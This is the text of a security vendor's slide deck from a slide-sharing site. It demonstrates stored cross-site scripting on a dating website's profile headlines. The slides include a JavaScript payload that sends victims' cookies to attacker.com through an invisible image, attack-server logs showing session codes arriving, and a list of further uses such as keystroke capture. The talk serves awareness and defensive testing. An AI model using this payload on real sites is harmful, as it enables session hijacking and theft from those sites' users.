Caleb Xss Dating Website

610 views

Published on

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Caleb Xss Dating Website

  1. 1. Cross-site Scripting Attacks Caleb Sima S.P.I Dynamics
  2. 2. Simple XSS Checking
  3. 3. Fill in the forms
  4. 4. User input is reflected back
  5. 5. Let’s try some javascript
  6. 6. Bingo!
  7. 7. XSS on a large scale <ul><li>Create a simple profile </li></ul><ul><li>Which text is seen by the most people? </li></ul>
  8. 8. Let’s run a test <ul><li>Plain vanilla XSS entry in the headline </li></ul>
  9. 9. Let’s view the profile and see what happens
  10. 10. Success!
  11. 11. Does it execute in a displayed list of results?
  12. 12. Yes it does.
  13. 13. Create an external JS file 1. Attacker creates exploit profile 2. Victim executes date search 3. Headline is viewed. Exploited 4. Victim requests attack payload 5. Payload delivered. 6. Victim sends cookie to attacker Dating Website Attack Server
  14. 14. Create the exploit payload document.write(&quot;<img src= http://attacker.com/ &quot; + document.cookie + &quot; width=0 >&quot;)
  15. 15. Let’s execute the attack <ul><li>Embed the script to download from the attackers server. </li></ul>
  16. 16. View the profile <ul><li>Success. Invisible execution </li></ul>
  17. 17. Execute the attack via search <ul><li>Everything looks normal </li></ul>
  18. 18. Check out the attack logs <ul><li>2006-08-31 19:54:47 0.0.0.0 GET /a.js - 80 – 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+6.0;+MSNIA;+Windows+98;+.NET+CLR+1.1.4322) 200 0 0 </li></ul><ul><li>2006-08-31 19:54:47 0.0.0.0 GET /pIDCode=2AD4A95012D09660 - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+6.0;+MSNIA;+Windows+98;+.NET+CLR+1.1.4322) 404 0 2 </li></ul><ul><li>2006-08-31 19:55:48 0.0.0.0 GET /a.js - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 200 0 0 </li></ul><ul><li>2006-08-31 19:55:48 0.0.0.0 GET /pIDCode=2AD4A95012D01871 - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 404 0 2 </li></ul><ul><li>2006-08-31 19:56:33 0.0.0.0 GET /a.js - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 304 0 0 </li></ul><ul><li>2006-08-31 19:56:33 0.0.0.0 GET /pIDCode=2AD4A95012D04309 - 80 - 0.0.0.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+1.1.4322;+.NET+CLR+2.0.50727;+InfoPath.2) 404 0 2 </li></ul>
  19. 19. Real Exploitation <ul><li>Browser Zombies </li></ul><ul><li>Control any victim browser </li></ul><ul><li>Capture keystrokes </li></ul><ul><li>Capture browsing activity </li></ul><ul><li>Force the user to view sites of your choosing </li></ul>
  20. 20. Try WebInspect SPI Dynamics, Inc. 115 Perimeter Center Place Suite 1100 Atlanta, GA 30346 Caleb Sima [email_address]

×